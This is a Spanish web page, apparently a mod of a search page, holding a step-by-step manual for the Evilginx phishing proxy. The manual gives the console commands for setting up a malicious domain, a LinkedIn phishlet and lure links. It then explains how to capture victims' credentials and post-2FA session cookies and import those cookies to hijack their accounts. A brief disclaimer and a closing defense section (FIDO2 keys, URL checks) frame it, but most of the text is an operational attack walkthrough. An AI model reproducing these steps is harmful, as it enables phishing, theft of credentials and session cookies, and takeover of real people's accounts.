Hora

Búsqueda en google modd by crackerdar

Qué buscar: Modificador: seleccionar:

Favor de pulsar lanzar para iniciar su Búsqueda.


Escribe tu prompt o consulta









Escribe tu consulta en el área de texto y haz clic en "Lanzar búsqueda" o presiona Enter para buscar en Google modo ia.

Manual de Uso de Evilginx (Entorno Controlado)

 

📖 Manual de Uso de Evilginx (Entorno Controlado)

Nota de Advertencia Legal y Ética: Este manual es exclusivamente con fines educativos y para su uso en entornos de prueba de penetración con autorización explícita por escrito de los propietarios de los sistemas. El uso de estas técnicas contra sitios web sin permiso es ilegal en la mayoría de las jurisdicciones .


Paso 1: Requisitos Previos

  • Servidor: Un VPS (Servidor Privado Virtual) con Linux (Ubuntu/Debian).

  • Dominio: Un dominio controlado por ti (para el ataque simulado). En el texto, el autor usa incibenomedenuncies.com como dominio malicioso.

  • Certificado SSL/TLS: Necesitas un certificado para tu dominio malicioso para que la conexión HTTPS parezca legítima. Puedes obtener uno gratis con Let's Encrypt .

Paso 2: Instalación

La forma más rápida es descargar el binario precompilado desde el repositorio oficial de Evilginx o clonarlo y compilarlo.

bash
# Clonar el repositorio (ejemplo conceptual)
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Compilar o ejecutar el binario según las instrucciones del repositorio

Paso 3: Configuración del "Phishlet"

Evilginx funciona con "phishlets", que son perfiles de configuración para sitios específicos (ej. Office 365, Facebook, Instagram). El texto menciona que la herramienta necesita "pequeños archivos de configuración".

  1. Inicia Evilginx: ./evilginx -p (modo phishlet).

  2. Configura el dominio y IP de tu servidor (Ejemplo conceptual basado en el texto):

    bash
    config domain your-malicious-domain.com
config ip X.X.X.X (IP de tu servidor)

  3. Configura el phishlet para el objetivo (ej. linkedin):

    bash
    phishlets host linkedin your-malicious-domain.com

Paso 4: Creación del "Lure" (Señuelo)

Este paso corresponde a cuando el autor dice: "con un link personalizado que activa el demonio".

  1. Crea un señuelo para el phishlet configurado:

    bash
    lures create linkedin

  2. Obtén la URL del señuelo (el enlace que recibirá la víctima):

    bash
    lures get-url [ID_DEL_SEÑUELO]

    Esto generará un enlace como https://your-malicious-domain.com/some-random-path. Este enlace es el que se envía a la víctima.

Paso 5: Ejecución del Ataque (Simulado)

  1. Activa el phishlet para empezar a interceptar:

    bash
    phishlets enable linkedin

    A partir de este momento, cualquier visita al enlace generado será interceptada.

  2. Flujo de la Víctima (como se describe en el texto):

    • La víctima recibe el enlace (el "lure") .

    • Al hacer clic, ve el sitio legítimo (ej. la pantalla de login de LinkedIn), pero su tráfico pasa por tu servidor.

    • Introduce usuario, contraseña y código 2FA.

    • Evilginx captura las credenciales y, lo más importante, la cookie de sesión que el sitio legítimo envía después de verificar el 2FA.

Paso 6: Captura de Sesión (El "Cookie Hijack")

Este es el punto crítico del texto: "Cualquiera que se haga con estas cookies de sesión puede suplantarte sin tener que loguearse".

  1. En la consola de Evilginx, verás las credenciales y las sesiones capturadas:

    bash
    sessions

  2. Para suplantar a la víctima (como hace el autor al final del texto), necesitas importar esa cookie en tu navegador.

    • Utiliza un editor de cookies (como "Cookie-Editor" extensión de Chrome).

    • Copia el contenido de la cookie de sesión capturada por Evilginx.

    • Pégala en tu navegador mientras estás en el dominio legítimo (ej. linkedin.com).

    • Resultado: Recargarás la página y entrarás directamente a la cuenta de la víctima sin necesidad de contraseña ni 2FA, como se demuestra en el video del texto.

🛡️ Conclusión y Defensa

El texto y el manual demuestran que el factor humano sigue siendo el eslabón más débil. No importa cuán robusto sea un sistema de 2FA si el atacante roba la "sesión" después de que tú la abriste.

Las defensas clave según el texto y la investigación son:

  1. Inspeccionar la URL y el Certificado: El autor sugiere verificar siempre el dominio y que el certificado SSL corresponda exactamente al sitio que visitas (aunque advierte que esto también puede ser suplantado en ciertas condiciones).

  2. Usar 2FA resistente al phishing (FIDO2/WebAuthn): Llaves físicas (como YubiKey) o passkeys. A diferencia del SMS o apps TOTP (como Google Authenticator), estas tecnologías vinculan la autenticación al origen del dominio, haciendo que este tipo de proxy sea inútil .

  3. Desconfiar de los enlaces: Nunca introduzcas credenciales en enlaces recibidos por correo o mensajes inesperados. Accede manualmente escribiendo la URL en el navegador.

Nota final: Tal como advierte el autor del texto, esta técnica es poderosa y real. Su conocimiento es esencial para que los defensores puedan entender la magnitud de la amenaza y aplicar las defensas adecuadas.

We do not Host any of these Files
We are just a search engine.